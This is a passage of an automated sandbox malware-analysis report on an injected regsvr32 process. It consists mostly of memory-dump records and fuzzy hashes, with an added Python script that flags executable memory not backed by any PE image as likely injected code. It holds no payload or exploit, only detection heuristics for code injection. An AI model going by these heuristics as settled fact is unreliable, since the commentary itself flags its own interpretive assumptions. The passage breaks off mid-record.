                                                                               • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                               • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                               • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                               • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $/i:S$SYNC
                                                                              • API String ID: 0-2968757536
                                                                              • Opcode ID: ac177cde55d934ea3229f6e46727efc95247684de5b235848fd492cd54ea5883
                                                                              • Instruction ID: 86b711a56954de47a1b2250963d1b28a39d2f189b8891af6204f27304c20f241
                                                                              • Opcode Fuzzy Hash: ac177cde55d934ea3229f6e46727efc95247684de5b235848fd492cd54ea5883
                                                                              • Instruction Fuzzy Hash: B3025932B0CAC690EA759B15F4907EBA360FB86B84F444126DF8C87A89DF7DD185DB40
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                               • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                               • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                               • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                               • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmp
                                                                               • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                               • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                               • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                               • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $/i:S$SYNC
                                                                              • API String ID: 0-2968757536
                                                                              • Opcode ID: e569dd2791f8ce051f7617b4e522db9f74cb217e870ec011aaa6c020ba1508ba
                                                                              • Instruction ID: 94923a4043559effd41c17893907330a43ae510be0a763ba5a9fc0645c5564bb
                                                                              • Opcode Fuzzy Hash: e569dd2791f8ce051f7617b4e522db9f74cb217e870ec011aaa6c020ba1508ba
                                                                              • Instruction Fuzzy Hash: 5D026A32B0CAC690EA759B15F4907EBA360FB86B84F444126DF8C87A89DF7DD185DB40

                                                                               Control-flow Graph
                                                                               [Graph of the function whose entry block is 7ffcf4495829 in the 7ffcf4490000 dump of regsvr32 (process 0000000E), with basic blocks coloured executed / not executed. The graph is rendered as an image in the original report; its block-edge listing is not reproduced here.]
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: :$H
                                                                              • API String ID: 0-1599246672
                                                                              • Opcode ID: 0aa0c20f71d049c58fdc7db36e9dcd4046f97113a9619efc772a2962bdbf7f37
                                                                              • Instruction ID: 19a2eaedb5228019aea8a74cbdac857163b5ec59f1f83393ae413ae327648384
                                                                              • Opcode Fuzzy Hash: 0aa0c20f71d049c58fdc7db36e9dcd4046f97113a9619efc772a2962bdbf7f37
                                                                              • Instruction Fuzzy Hash: 1222F852F1C96A4BFB95E72884B5378EAD2EF84714F480179D01DE32CBCE28AC41D769
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2136151078.0000000002F90000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_2f90000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 8b5c64e0111f0c9f7a75e77ea5bdc65aabc36e30693f977857ec78a3b3b05715
                                                                              • Instruction ID: 0cf515aff055a7502f8cd91b84ab4b7cf6a69ccaf8eefeb170c2d1caf8b53bf0
                                                                              • Opcode Fuzzy Hash: 8b5c64e0111f0c9f7a75e77ea5bdc65aabc36e30693f977857ec78a3b3b05715
                                                                              • Instruction Fuzzy Hash: EB62F761B2C6058BCF2E551D44E423E6292BF84B88F64093EE69BD7B51DB70DC81CB87
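Read together, these records state something the signature list at the top of the report only summarises. The functions disassembled at 7FFCF4490000 and 02F90000 in regsvr32 (process 0000000E) come from dumps marked "based on PE: false", i.e. executable memory that no module on disk accounts for, and the 02F90000 code calls VirtualAlloc (listed here under the report's normalised name AllocVirtual, which I read as the word-sorted form of VirtualAlloc; that reading is an assumption). The 7FFD348E0000 functions, by contrast, sit in a PE-backed image. The Python below is an added example, not Joe Sandbox code: it parses these record lines and flags regions whose disassembled code is not PE-backed. The sample lines are copied from this section; the decoding of the dump name's protection and region-type fields is an assumption stated in the comments.

```python
import re
from dataclasses import dataclass, field

# winnt.h constants. Reading dotted field 5 of the .sdmp name as the page
# protection and field 7 as the region type is inferred from the values on this
# page (0x40/0x20000 for the unbacked regions, 0x20/0x1000000 for the module)
# and is an assumption, not documented Joe Sandbox behaviour.
PROTECTIONS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_BITS = 0xF0   # any PAGE_EXECUTE* value
MEM_TYPES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Three record fragments copied from this report (process 0000000E, regsvr32),
# fields in the order they appear on the page.
SAMPLE_LINES = """\
• Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
• Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
• API ID:
• Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
• Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
• API ID:
• Source File: 0000000E.00000002.2136151078.0000000002F90000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
• Snapshot File: hcaresult_14_2_2f90000_regsvr32.jbxd
• API ID: AllocVirtual
"""

SOURCE_RE = re.compile(
    r"Source File: (?P<pid>[0-9A-F]{8})\.[0-9A-F]{8}\.\d+\.(?P<base>[0-9A-F]{16})\."
    r"(?P<protect>[0-9A-F]{8})\.[0-9A-F]{8}\.(?P<mtype>[0-9A-F]{8})\.[0-9A-F]{8}\.sdmp, "
    r"Offset: (?P<offset>[0-9A-F]+), based on PE: (?P<pe>true|false)")
SNAPSHOT_RE = re.compile(r"Snapshot File: hcaresult_\d+_\d+_[0-9a-f]+_(?P<proc>.+?)\.jbxd")
API_RE = re.compile(r"API ID:\s*(?P<apis>.*)")


@dataclass
class FunctionRecord:
    pid: int
    region_base: int     # the "Offset:" value: the allocation the function lives in
    dump_base: int       # first page of the dumped range
    protect: int
    mtype: int
    pe_backed: bool
    process: str = ""
    apis: list = field(default_factory=list)


def parse_records(text):
    """Turn the bullet lines of function records into FunctionRecord objects."""
    records = []
    for line in text.splitlines():
        m = SOURCE_RE.search(line)
        if m:
            records.append(FunctionRecord(
                pid=int(m["pid"], 16), region_base=int(m["offset"], 16),
                dump_base=int(m["base"], 16), protect=int(m["protect"], 16),
                mtype=int(m["mtype"], 16), pe_backed=(m["pe"] == "true")))
        elif records and (m := SNAPSHOT_RE.search(line)):
            records[-1].process = m["proc"]
        elif records and (m := API_RE.search(line)):
            # Joe Sandbox joins several API names with '$'; an empty ID adds nothing
            records[-1].apis.extend(a for a in m["apis"].split("$") if a)
    return records


def describe_protection(protect):
    return PROTECTIONS.get(protect & 0xFF, f"0x{protect:X}")


def _note(reasons, text):
    if text not in reasons:
        reasons.append(text)


def suspicious_regions(records):
    """Group records by allocation base; return {base: [reasons]} for regions whose
    disassembled code is not backed by a PE image on disk."""
    findings = {}
    for r in records:
        reasons = findings.setdefault(r.region_base, [])
        if r.pe_backed:
            continue     # inside a mapped module (regsvr32.exe or one of its DLLs)
        who = r.process or f"pid {r.pid}"
        _note(reasons, f"{who}: executing code in memory not backed by any PE image")
        prot = r.protect & 0xFF
        if prot == 0x40:
            _note(reasons, "pages are PAGE_EXECUTE_READWRITE (write-then-execute, typical of injected code)")
        elif prot & EXECUTABLE_BITS:
            _note(reasons, f"pages are {describe_protection(prot)}")
        if MEM_TYPES.get(r.mtype) == "MEM_PRIVATE":
            _note(reasons, "region type MEM_PRIVATE (VirtualAlloc/heap memory, not a file mapping)")
        for api in r.apis:
            _note(reasons, f"calls {api} from the unbacked region")
    return {base: reasons for base, reasons in findings.items() if reasons}
```

Run over a whole report's function listing, the grouping by "Offset:" yields one finding per injected allocation rather than one per function, and the protection decode separates RWX private memory, the pattern seen here, from a read-only mapped view that merely happened to contain code.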

                                                                               Control-flow Graph
                                                                               [Graph of the function whose entry block is 7ffcf449cecd in the 7ffcf4490000 dump of regsvr32 (process 0000000E), with basic blocks coloured executed / not executed. The graph is rendered as an image in the original report; its block-edge listing is not reproduced here.]
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: uK_^
                                                                              • API String ID: 0-2962936059
                                                                              • Opcode ID: 0786b39455a344931cad407269396901f3e7245999cc3659d8fe16ce91b50d5c
                                                                              • Instruction ID: 8cc18d5b711200c8796a49bead6f56f6ae5144589d981cc4f2d2b94bfd8e29d1
                                                                              • Opcode Fuzzy Hash: 0786b39455a344931cad407269396901f3e7245999cc3659d8fe16ce91b50d5c
                                                                              • Instruction Fuzzy Hash: 19423530B18A5E4FEB99E72884B46F5BBD1FF94304B4445BAD05ED71CADE18E841C7A0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 3Z
                                                                              • API String ID: 0-2615429446
                                                                              • Opcode ID: 3612e9abeab1d63bf4a2817db1ac200d5a54a75844594f1c7c204901bc13e2ce
                                                                              • Instruction ID: 87ab2034af828ed5672e66e4a5878535d96b67469b05a3ba0a9f8a41de2ef251
                                                                              • Opcode Fuzzy Hash: 3612e9abeab1d63bf4a2817db1ac200d5a54a75844594f1c7c204901bc13e2ce
                                                                              • Instruction Fuzzy Hash: 3112F961F1C96E4FEB84FB2884A56B8BBD1EF55714F44007AE05DE32CBDD18A841CBA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: H
                                                                              • API String ID: 0-2852464175
                                                                              • Opcode ID: c86493537dffbb977cf8ad0a1c817fdd6edd1edaca62f3a577b4e369a4b9b15b
                                                                              • Instruction ID: b91f7042c70474ba7caf23161ab5a3765754b44606d92c51273524e4f9118471
                                                                              • Opcode Fuzzy Hash: c86493537dffbb977cf8ad0a1c817fdd6edd1edaca62f3a577b4e369a4b9b15b
                                                                              • Instruction Fuzzy Hash: 5722E752F2C96A5AE798F72884B5774FAD2EF84604F4801B9D01DE32CBCD18EC41D76A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: H
                                                                              • API String ID: 0-2852464175
                                                                              • Opcode ID: f463da9f6a09508d93f71a145a4279745b062ed64458557eed5402f0430bc733
                                                                              • Instruction ID: d73fda4bcc58c903908a464701ec51b2bb388ffc029edb70db7fb0fd6ecf7c76
                                                                              • Opcode Fuzzy Hash: f463da9f6a09508d93f71a145a4279745b062ed64458557eed5402f0430bc733
                                                                              • Instruction Fuzzy Hash: 4522E852F2C96A5AE798F72884B5774FAD2EF84704F0801B9D01DE32DBCD18E841D66A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: H
                                                                              • API String ID: 0-2852464175
                                                                              • Opcode ID: 5a9cf9819431370b67c47039263e7b06b2f5d7aa2f637a4c7b9e061cc9246fe8
                                                                              • Instruction ID: 7015fd9434fbda5166bfed428504b429b1906258d5548af4863cdc42170d9068
                                                                              • Opcode Fuzzy Hash: 5a9cf9819431370b67c47039263e7b06b2f5d7aa2f637a4c7b9e061cc9246fe8
                                                                              • Instruction Fuzzy Hash: 7612F752F2C96A5BE798F72884B5774EAD2EF84604F0801B9D01DE32CBCD18EC41D76A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: d
                                                                              • API String ID: 0-2564639436
                                                                              • Opcode ID: a88d7215c8664c9c96370fc77f8f7f217bdbb189b76d5d5304331ef5fb58d217
                                                                              • Instruction ID: f3f31ee89555e37c7fa695b89ae9c0c716c567ce3deb69b5bffd662cbe4235d5
                                                                              • Opcode Fuzzy Hash: a88d7215c8664c9c96370fc77f8f7f217bdbb189b76d5d5304331ef5fb58d217
                                                                              • Instruction Fuzzy Hash: E6E11330A18A098FEB58DF18C495575B7E1FF98310B1446BDE45ED728ADE34EC42CBA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: kE
                                                                              • API String ID: 0-1687065583
                                                                              • Opcode ID: 917ab68f4ad05fc1e73164b46ac60e467b38bd7e3f8b3a4e229948b44a770bca
                                                                              • Instruction ID: 1c2afaf869dd00d88e6b696ec30005e37e8ec1ce1e6c0fd7f0a2b78af9d21966
                                                                              • Opcode Fuzzy Hash: 917ab68f4ad05fc1e73164b46ac60e467b38bd7e3f8b3a4e229948b44a770bca
                                                                              • Instruction Fuzzy Hash: 16F16531A1895D8FDB98EF58C4E1AA8BBE2EF98314F4401A5C41EF72CACD35E841CB54
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: sJ_H
                                                                              • API String ID: 0-1625772097
                                                                              • Opcode ID: 569200a7a32dc4120248d51f8bcf21c5b081175d732fadf1b3eb1af31d5b6ae7
                                                                              • Instruction ID: e01ede6e93e1e3608a925298566bd255650cfa0a3a1c40ef2a244914a02d57ef
                                                                              • Opcode Fuzzy Hash: 569200a7a32dc4120248d51f8bcf21c5b081175d732fadf1b3eb1af31d5b6ae7
                                                                              • Instruction Fuzzy Hash: CFC1EA61B1C9594BEB98FB2884B5678FBD2FF98314B4401B9D01DF32CADD18AC42C7A5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: fK_L
                                                                              • API String ID: 0-26171842
                                                                              • Opcode ID: 235d33d69d1b4815352f0f778fe09c7e4fbe58bd27f7d1afdba17c8606061541
                                                                              • Instruction ID: 1d7036883e6365ff4d3ae34c275514c648cc8598c015534ba9e5a5b94ad268d9
                                                                              • Opcode Fuzzy Hash: 235d33d69d1b4815352f0f778fe09c7e4fbe58bd27f7d1afdba17c8606061541
                                                                              • Instruction Fuzzy Hash: 98B14B22A0C9AD4BE7A4E628C8A61B8BFE1EF85320F4401B9D05DE71CBDD1C7841D7B5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: kE
                                                                              • API String ID: 0-1687065583
                                                                              • Opcode ID: bc8bd4cd560cb911d57f715dc7a7251fae15d538cfafe47a906ad3db239d3387
                                                                              • Instruction ID: 9d3c42dc379269151f46a46d72516460d837e8546633b9c84600f1d984f9661c
                                                                              • Opcode Fuzzy Hash: bc8bd4cd560cb911d57f715dc7a7251fae15d538cfafe47a906ad3db239d3387
                                                                              • Instruction Fuzzy Hash: 9F914F70A189698BEB98EF18C4A5BA8BBE1FF58304F4441B4D05DF72C6DE34E881CB51
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ;
                                                                              • API String ID: 0-945197754
                                                                              • Opcode ID: 4989a8709685ead42c46e5e135c4dad894e90ad6875da7c139910280dfe9626d
                                                                              • Instruction ID: 768391d578b8c1190a200c702675e5e623aca0e680ed1bc5e94f72f6f48ae904
                                                                              • Opcode Fuzzy Hash: 4989a8709685ead42c46e5e135c4dad894e90ad6875da7c139910280dfe9626d
                                                                              • Instruction Fuzzy Hash: 61614962A0D5A90BE754FB2CE4F11F97FD1EF95224B0801B7D04DEB1C7DD085846CA60
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: H
                                                                              • API String ID: 0-2852464175
                                                                              • Opcode ID: 3366ef45b6b261a3bd08e168188e2dad32e30d61d729175387f07cf261ca617e
                                                                              • Instruction ID: 89d9c1cdf8cb2b7399a20dd26c0ea69c2224ad4e82f292f45c73266242ba7a12
                                                                              • Opcode Fuzzy Hash: 3366ef45b6b261a3bd08e168188e2dad32e30d61d729175387f07cf261ca617e
                                                                              • Instruction Fuzzy Hash: 12710952F1C96B4AFB99E62C84B1374EAC2EF94614F080179D05EE33CBDD28EC01D669
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: kE
                                                                              • API String ID: 0-1687065583
                                                                              • Opcode ID: bef6bd85c420cb323107aeaebc009f4e9152ee58645784dfc67ab13e93ead9fa
                                                                              • Instruction ID: 37cb6364310ee6dfbbf1ac1703bda2f0b7daca4bdb567843a3762bc34666b39c
                                                                              • Opcode Fuzzy Hash: bef6bd85c420cb323107aeaebc009f4e9152ee58645784dfc67ab13e93ead9fa
                                                                              • Instruction Fuzzy Hash: 85814D70A189698BEB98EF58C4A5BA8BBE1FF58304F444174D01DF72DADE38E841CB51
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: H
                                                                              • API String ID: 0-2852464175
                                                                              • Opcode ID: 0fc4a1021c51d8cfbe80d7798e369e3031d94deea528e14cab34537ab434cbd5
                                                                              • Instruction ID: c252ae8d4c7df2ed4b743f691de5c45d00e671ccb9c18c06fc53a217efd5f468
                                                                              • Opcode Fuzzy Hash: 0fc4a1021c51d8cfbe80d7798e369e3031d94deea528e14cab34537ab434cbd5
                                                                              • Instruction Fuzzy Hash: 7151F952F1C96B4AEB98E62884B5374EAC2EF94614F080179D45EF33CBDD28FC01D669
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: kE
                                                                              • API String ID: 0-1687065583
                                                                              • Opcode ID: 619d04094b3ba2411cd17f5501c0f42860ab11e5591b1c288770b2667ee93ea9
                                                                              • Instruction ID: 96886c2c393c2d7d4ec46258f4e669c5390fe492b5f52670edce1d3dee4d7529
                                                                              • Opcode Fuzzy Hash: 619d04094b3ba2411cd17f5501c0f42860ab11e5591b1c288770b2667ee93ea9
                                                                              • Instruction Fuzzy Hash: 0D614031A1895D8FDB98EF54C4E1AA8BBE2EF58304F4441A8D41EF72CACE24E841CB55
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: kE
                                                                              • API String ID: 0-1687065583
                                                                              • Opcode ID: 525830f1e345cd5738841b4d148b52889fcf6a3fb09cca60f5bfe2172387239f
                                                                              • Instruction ID: 341dbcc0bf729cf3ef3c7aea5e2a838ca3e591499c2e32324c729c8c1aef9feb
                                                                              • Opcode Fuzzy Hash: 525830f1e345cd5738841b4d148b52889fcf6a3fb09cca60f5bfe2172387239f
                                                                              • Instruction Fuzzy Hash: 9A312862A1C96A4FF748FB18D4B51B8BBD1FF92215B0801B6D05DF70CBCD289845C676
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: kE
                                                                              • API String ID: 0-1687065583
                                                                              • Opcode ID: e074a9b927624ccadc4d2671dd2a144ea59b8c883dca1538a0dd7762fea67d18
                                                                              • Instruction ID: 23020474f8b1201248711d525628cfc20bb933199bfc97f75dee95f840e39c43
                                                                              • Opcode Fuzzy Hash: e074a9b927624ccadc4d2671dd2a144ea59b8c883dca1538a0dd7762fea67d18
                                                                              • Instruction Fuzzy Hash: 6A312D70A1896D8FDB98EF14C8A5BA8B7E2EF48304F5401B9D01EF72D5CE24E881CB15
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ;
                                                                              • API String ID: 0-945197754
                                                                              • Opcode ID: 69f88082eaf5475619fd6c5ef77748636deeaf6bb892f51fe0cac352e4b02c98
                                                                              • Instruction ID: bb5bb50b2032a59bf0091b4b4559fa325b2aa5260341958c884b39d245edd6f5
                                                                              • Opcode Fuzzy Hash: 69f88082eaf5475619fd6c5ef77748636deeaf6bb892f51fe0cac352e4b02c98
                                                                              • Instruction Fuzzy Hash: 2DF04921E1CA5A0BFB58FA68A0F15F0FBD1DF94210B0802BAD01DE31CBCD489845CB61
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a69b416692ea18f37d7789d305c3d4d70ab5318d04565773f4212c907592fc5d
                                                                              • Instruction ID: 10bed4e0873a995e338725762efd0b45f00d0307f998b312fc08371d5bfbcb32
                                                                              • Opcode Fuzzy Hash: a69b416692ea18f37d7789d305c3d4d70ab5318d04565773f4212c907592fc5d
                                                                              • Instruction Fuzzy Hash: 1A329431B1CA294FD754FA2CD4A26B9B7E1FF98714B040179D05DE32DADE28E84287A1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 73ab48d9a9908a367a7190908835ff498377694d593f7b8f2bcc94e01d43ebfd
                                                                              • Instruction ID: ad890e9df40b33342ab94bf27c446594526517fe0558b0c8d25040beb1514b5b
                                                                              • Opcode Fuzzy Hash: 73ab48d9a9908a367a7190908835ff498377694d593f7b8f2bcc94e01d43ebfd
                                                                              • Instruction Fuzzy Hash: BB121C21F1C95E4FE758E628D8A92B9BBD1FF94310F0401BAE45DE31CADD1CA842C7A1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5d8e82234abd89a2e882fff301fe9a8c6209105e29a837ef6c8b8b6e54efffdd
                                                                              • Instruction ID: 0c76d1e5a51f1b1d077cbaaead3c51092e04ff4bb6243ba1c8f6227d4406674c
                                                                              • Opcode Fuzzy Hash: 5d8e82234abd89a2e882fff301fe9a8c6209105e29a837ef6c8b8b6e54efffdd
                                                                              • Instruction Fuzzy Hash: 73F1C721B1C92E4FEB88F728C4E5678BBD1EF59344B440179E05EE32CBDD18E84287A1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
